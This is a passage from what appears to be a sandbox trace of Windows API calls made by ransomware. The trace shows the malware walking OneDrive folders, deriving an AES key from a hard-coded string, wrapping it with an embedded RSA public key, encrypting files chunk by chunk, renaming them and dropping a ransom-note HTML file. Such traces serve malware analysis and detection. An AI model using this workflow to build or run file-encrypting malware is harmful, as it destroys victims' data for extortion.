(lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ka\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0279.011] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ka\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ka\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0279.013] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ka\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ka\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ka\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ka\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0279.014] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0279.014] CryptDestroyKey (hKey=0x2fb688) returned 1 [0279.014] CryptReleaseContext (hProv=0x2f2d820, dwFlags=0x0) returned 1 [0279.014] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0279.014] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0279.014] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ka\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ka\\readme_back_files.htm")) returned 0xffffffff [0279.014] AreFileApisANSI () returned 1 [0279.014] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28895b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0279.014] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ka\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ka\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0279.015] GetFileType (hFile=0x5d4c) returned 0x1 [0279.016] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0279.016] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0279.016] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\kk\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0279.017] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0279.017] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0279.017] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0279.017] GetLastError () returned 0x0 [0279.017] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\kk\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\kk\\filesync.localizedresources.dll.mui")) returned 0x20 [0279.017] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\kk\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0279.017] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\kk\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\kk\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0279.018] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\kk\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\kk\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0279.019] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\kk\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0279.019] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f2da40) returned 1 [0279.021] CryptCreateHash (in: hProv=0x2f2da40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0279.021] lstrlenA (lpString="gkdJXzAzHsZgjyaYXoQmaXsDzMlQm") returned 29 [0279.021] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb5a8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0279.021] CryptDeriveKey (in: hProv=0x2f2da40, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb688) returned 1 [0279.021] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0279.021] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0279.021] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2d600) returned 1 [0279.022] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2d600, dwCertEncodingType=0x1, pInfo=0x2f373d0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f37400*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f37408*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fbac8) returned 1 [0279.023] CryptEncrypt (in: hKey=0x2fbac8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0279.023] CryptEncrypt (in: hKey=0x2fbac8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2d798*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2d798*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0279.023] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f2d798*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2d798*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0279.024] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.029] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.029] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.046] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.047] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.047] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.048] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.048] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.048] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.048] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.048] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.048] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.048] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.048] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.048] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.048] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.048] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.048] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.049] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.049] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.049] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.049] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.049] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.049] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.049] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.049] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.049] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.049] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.049] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.049] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.050] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.050] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.050] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.050] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.050] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.050] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.050] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.050] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.050] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.050] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.050] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.050] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.051] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.051] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.051] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.051] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.051] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.051] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.051] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.051] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.051] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.051] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.051] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.051] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.051] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.052] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.052] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.052] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.052] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.052] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.052] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.052] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.052] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.052] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.053] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.053] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: 